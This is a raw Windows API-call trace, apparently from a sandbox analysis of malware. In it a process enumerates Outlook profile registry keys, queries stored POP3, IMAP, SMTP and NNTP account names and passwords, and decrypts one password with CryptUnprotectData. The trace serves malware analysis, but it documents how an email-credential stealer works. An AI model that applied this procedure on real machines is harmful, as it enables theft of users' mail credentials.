LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.176] SHQueryValueExW (in: hkey=0x238, pszValue="POP3 User", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x1e) returned 0x0 [0185.176] GetProcessHeap () returned 0x840000 [0185.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.176] GetProcessHeap () returned 0x840000 [0185.176] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.177] SHQueryValueExW (in: hkey=0x238, pszValue="NNTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.177] GetProcessHeap () returned 0x840000 [0185.177] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.177] GetProcessHeap () returned 0x840000 [0185.177] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.179] SHQueryValueExW (in: hkey=0x238, pszValue="NNTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.179] GetProcessHeap () returned 0x840000 [0185.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.179] GetProcessHeap () returned 0x840000 [0185.179] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.180] SHQueryValueExW (in: hkey=0x238, pszValue="NNTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.180] GetProcessHeap () returned 0x840000 [0185.180] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.180] GetProcessHeap () returned 0x840000 [0185.180] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.181] SHQueryValueExW (in: hkey=0x238, pszValue="IMAP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.181] GetProcessHeap () returned 0x840000 [0185.181] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.181] GetProcessHeap () returned 0x840000 [0185.181] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.181] SHQueryValueExW (in: hkey=0x238, pszValue="IMAP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.181] GetProcessHeap () returned 0x840000 [0185.182] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.182] GetProcessHeap () returned 0x840000 [0185.182] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.182] SHQueryValueExW (in: hkey=0x238, pszValue="IMAP User", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.182] GetProcessHeap () returned 0x840000 [0185.182] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.182] GetProcessHeap () returned 0x840000 [0185.182] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.183] SHQueryValueExW (in: hkey=0x238, pszValue="HTTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.183] GetProcessHeap () returned 0x840000 [0185.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.184] GetProcessHeap () returned 0x840000 [0185.184] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.185] SHQueryValueExW (in: hkey=0x238, pszValue="HTTP Server URL", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.185] GetProcessHeap () returned 0x840000 [0185.185] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.185] GetProcessHeap () returned 0x840000 [0185.185] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.188] SHQueryValueExW (in: hkey=0x238, pszValue="HTTPMail User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.188] GetProcessHeap () returned 0x840000 [0185.188] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.188] GetProcessHeap () returned 0x840000 [0185.188] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.189] SHQueryValueExW (in: hkey=0x238, pszValue="HTTPMail Server", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.189] GetProcessHeap () returned 0x840000 [0185.189] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.190] SHQueryValueExW (in: hkey=0x238, pszValue="POP3 Port", pdwReserved=0x0, pdwType=0x19f358, pvData=0x19f360, pcbData=0x19f35c*=0x4 | out: pdwType=0x19f358*=0x0, pvData=0x19f360, pcbData=0x19f35c*=0x4) returned 0x2 [0185.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.192] SHQueryValueExW (in: hkey=0x238, pszValue="SMTP Port", pdwReserved=0x0, pdwType=0x19f358, pvData=0x19f360, pcbData=0x19f35c*=0x4 | out: pdwType=0x19f358*=0x0, pvData=0x19f360, pcbData=0x19f35c*=0x4) returned 0x2 [0185.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.193] SHQueryValueExW (in: hkey=0x238, pszValue="IMAP Port", pdwReserved=0x0, pdwType=0x19f358, pvData=0x19f360, pcbData=0x19f35c*=0x4 | out: pdwType=0x19f358*=0x0, pvData=0x19f360, pcbData=0x19f35c*=0x4) returned 0x2 [0185.193] GetProcessHeap () returned 0x840000 [0185.193] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.194] SHQueryValueExW (in: hkey=0x238, pszValue="POP3 Password2", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.194] GetProcessHeap () returned 0x840000 [0185.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.194] GetProcessHeap () returned 0x840000 [0185.194] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.195] SHQueryValueExW (in: hkey=0x238, pszValue="IMAP Password2", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.195] GetProcessHeap () returned 0x840000 [0185.195] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.195] GetProcessHeap () returned 0x840000 [0185.195] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.196] SHQueryValueExW (in: hkey=0x238, pszValue="NNTP Password2", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.196] GetProcessHeap () returned 0x840000 [0185.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.196] GetProcessHeap () returned 0x840000 [0185.196] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.198] SHQueryValueExW (in: hkey=0x238, pszValue="HTTPMail Password2", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.198] GetProcessHeap () returned 0x840000 [0185.198] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.198] GetProcessHeap () returned 0x840000 [0185.198] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.199] SHQueryValueExW (in: hkey=0x238, pszValue="SMTP Password2", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.199] GetProcessHeap () returned 0x840000 [0185.199] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.199] GetProcessHeap () returned 0x840000 [0185.199] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.200] SHQueryValueExW (in: hkey=0x238, pszValue="POP3 Password", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x3, pvData=0x875ed0*, pcbData=0x19f35c*=0x121) returned 0x0 [0185.201] LoadLibraryW (lpLibFileName="CRYPT32") returned 0x76160000 [0185.208] CryptUnprotectData (in: pDataIn=0x19f354, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19f35c | out: ppszDataDescr=0x0, pDataOut=0x19f35c) returned 1 [0185.215] GetProcessHeap () returned 0x840000 [0185.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x26) returned 0x870668 [0185.216] LocalFree (hMem=0x866cf0) returned 0x0 [0185.216] GetProcessHeap () returned 0x840000 [0185.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870668 | out: hHeap=0x840000) returned 1 [0185.216] GetProcessHeap () returned 0x840000 [0185.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.216] GetProcessHeap () returned 0x840000 [0185.216] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.217] SHQueryValueExW (in: hkey=0x238, pszValue="IMAP Password", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.217] GetProcessHeap () returned 0x840000 [0185.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.217] GetProcessHeap () returned 0x840000 [0185.217] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.226] SHQueryValueExW (in: hkey=0x238, pszValue="NNTP Password", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.226] GetProcessHeap () returned 0x840000 [0185.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.226] GetProcessHeap () returned 0x840000 [0185.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.233] SHQueryValueExW (in: hkey=0x238, pszValue="HTTP Password", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.233] GetProcessHeap () returned 0x840000 [0185.233] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.233] GetProcessHeap () returned 0x840000 [0185.233] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875ed0 [0185.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.234] SHQueryValueExW (in: hkey=0x238, pszValue="SMTP Password", pdwReserved=0x0, pdwType=0x19f358, pvData=0x875ed0, pcbData=0x19f35c*=0x208 | out: pdwType=0x19f358*=0x0, pvData=0x875ed0, pcbData=0x19f35c*=0x208) returned 0x2 [0185.234] GetProcessHeap () returned 0x840000 [0185.235] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.235] GetProcessHeap () returned 0x840000 [0185.235] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ab8 | out: hHeap=0x840000) returned 1 [0185.235] GetProcessHeap () returned 0x840000 [0185.235] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.235] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.237] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f7d8 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0185.237] GetProcessHeap () returned 0x840000 [0185.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc6) returned 0x868ab0 [0185.237] GetProcessHeap () returned 0x840000 [0185.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.237] GetProcessHeap () returned 0x840000 [0185.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c48 [0185.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.239] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x871c48 | out: phkResult=0x871c48*=0x248) returned 0x0 [0185.239] GetProcessHeap () returned 0x840000 [0185.239] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ab8 [0185.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.240] SHEnumKeyExW (in: hkey=0x248, dwIndex=0x0, pszName=0x875ab8, pcchName=0x19f7c4 | out: pszName="", pcchName=0x19f7c4) returned 0x103 [0185.240] GetProcessHeap () returned 0x840000 [0185.240] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ab8 | out: hHeap=0x840000) returned 1 [0185.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.242] RegCloseKey (hKey=0x248) returned 0x0 [0185.242] GetProcessHeap () returned 0x840000 [0185.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c48 | out: hHeap=0x840000) returned 1 [0185.242] GetProcessHeap () returned 0x840000 [0185.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x868ab0 | out: hHeap=0x840000) returned 1 [0185.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.243] RegCloseKey (hKey=0x238) returned 0x0 [0185.243] GetProcessHeap () returned 0x840000 [0185.243] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c38 | out: hHeap=0x840000) returned 1 [0185.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.245] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x2, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="00000003", pcchName=0x19f7f4) returned 0x0 [0185.245] GetProcessHeap () returned 0x840000 [0185.245] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0185.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.246] RegOpenKeyW (in: hKey=0x220, lpSubKey="00000003", phkResult=0x871b28 | out: phkResult=0x871b28*=0x238) returned 0x0 [0185.246] GetProcessHeap () returned 0x840000 [0185.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ab8 [0185.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.248] SHQueryValueExW (in: hkey=0x238, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x875ab8, pcbData=0x19f368*=0x208 | out: pdwType=0x0, pvData=0x875ab8, pcbData=0x19f368*=0x208) returned 0x2 [0185.248] GetProcessHeap () returned 0x840000 [0185.248] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ab8 | out: hHeap=0x840000) returned 1 [0185.248] GetProcessHeap () returned 0x840000 [0185.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.248] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.249] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f7d8 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0185.249] GetProcessHeap () returned 0x840000 [0185.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc6) returned 0x868500 [0185.250] GetProcessHeap () returned 0x840000 [0185.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.250] GetProcessHeap () returned 0x840000 [0185.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0185.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.251] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x871b38 | out: phkResult=0x871b38*=0x248) returned 0x0 [0185.251] GetProcessHeap () returned 0x840000 [0185.251] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ab8 [0185.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.253] SHEnumKeyExW (in: hkey=0x248, dwIndex=0x0, pszName=0x875ab8, pcchName=0x19f7c4 | out: pszName="", pcchName=0x19f7c4) returned 0x103 [0185.253] GetProcessHeap () returned 0x840000 [0185.253] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ab8 | out: hHeap=0x840000) returned 1 [0185.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.255] RegCloseKey (hKey=0x248) returned 0x0 [0185.255] GetProcessHeap () returned 0x840000 [0185.255] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0185.255] GetProcessHeap () returned 0x840000 [0185.255] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x868500 | out: hHeap=0x840000) returned 1 [0185.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.257] RegCloseKey (hKey=0x238) returned 0x0 [0185.257] GetProcessHeap () returned 0x840000 [0185.257] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0185.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.258] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x3, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.259] GetProcessHeap () returned 0x840000 [0185.259] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.261] RegCloseKey (hKey=0x220) returned 0x0 [0185.261] GetProcessHeap () returned 0x840000 [0185.261] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c88 | out: hHeap=0x840000) returned 1 [0185.261] GetProcessHeap () returned 0x840000 [0185.261] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.263] RegCloseKey (hKey=0x22c) returned 0x0 [0185.263] GetProcessHeap () returned 0x840000 [0185.263] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0185.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.264] SHEnumKeyExW (in: hkey=0x234, dwIndex=0xa, pszName=0x875288, pcchName=0x19f824 | out: pszName="dc48e7c6d33441458035ee20beefe18a", pcchName=0x19f824) returned 0x0 [0185.264] GetProcessHeap () returned 0x840000 [0185.264] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0185.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.266] RegOpenKeyW (in: hKey=0x234, lpSubKey="dc48e7c6d33441458035ee20beefe18a", phkResult=0x871ba8 | out: phkResult=0x871ba8*=0x22c) returned 0x0 [0185.266] GetProcessHeap () returned 0x840000 [0185.266] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.268] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.268] GetProcessHeap () returned 0x840000 [0185.269] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.269] GetProcessHeap () returned 0x840000 [0185.269] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.269] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.274] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a") returned 88 [0185.274] GetProcessHeap () returned 0x840000 [0185.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.274] GetProcessHeap () returned 0x840000 [0185.274] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.274] GetProcessHeap () returned 0x840000 [0185.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b98 [0185.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.276] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x871b98 | out: phkResult=0x871b98*=0x220) returned 0x0 [0185.276] GetProcessHeap () returned 0x840000 [0185.276] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.277] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.277] GetProcessHeap () returned 0x840000 [0185.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.279] RegCloseKey (hKey=0x220) returned 0x0 [0185.279] GetProcessHeap () returned 0x840000 [0185.279] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b98 | out: hHeap=0x840000) returned 1 [0185.279] GetProcessHeap () returned 0x840000 [0185.279] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.280] RegCloseKey (hKey=0x22c) returned 0x0 [0185.280] GetProcessHeap () returned 0x840000 [0185.280] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0185.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.281] SHEnumKeyExW (in: hkey=0x234, dwIndex=0xb, pszName=0x875288, pcchName=0x19f824 | out: pszName="e57f6d0b27b6134693ca7113a4ab34a6", pcchName=0x19f824) returned 0x0 [0185.281] GetProcessHeap () returned 0x840000 [0185.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0185.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.283] RegOpenKeyW (in: hKey=0x234, lpSubKey="e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x871b18 | out: phkResult=0x871b18*=0x22c) returned 0x0 [0185.283] GetProcessHeap () returned 0x840000 [0185.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.284] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.284] GetProcessHeap () returned 0x840000 [0185.284] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.284] GetProcessHeap () returned 0x840000 [0185.284] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.285] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.286] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6") returned 88 [0185.286] GetProcessHeap () returned 0x840000 [0185.286] RtlAllocateHeap (HeapHandle=0x840000, 